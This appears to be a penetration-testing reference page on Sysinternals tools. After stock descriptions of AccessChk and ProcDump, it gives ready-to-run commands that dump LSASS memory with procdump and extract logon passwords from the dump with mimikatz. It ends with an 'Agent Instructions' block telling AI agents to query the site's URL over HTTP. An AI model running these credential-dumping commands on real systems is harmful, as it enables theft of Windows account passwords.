# psTools / Sysinternals ### AccessChk As a part of ensuring that they've created a secure environment Windows administrators often need to know what kind of accesses specific users or groups have to resources including files, directories, Registry keys, global objects and Windows services. AccessChk quickly answers these questions with an intuitive interface and output. ### procdump ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. ProcDump also includes hung window monitoring (using the same definition of a window hang that Windows and Task Manager use), unhandled exception monitoring and can generate dumps based on the values of system performance counters. It also can serve as a general process dump utility that you can embed in other scripts. **Dump LSASS** 32bit: `procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp` 64bit: `procdump.exe -accepteula -ma -64 lsass.exe lsass.dmp` Mimikatz can be used offline in order to read the contents of the LSASS dump and especially sections that contain logon passwords. `mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonPasswords exit` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://infra.newerasec.com/infrastructure-testing/tools/pstools-sysinternals.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.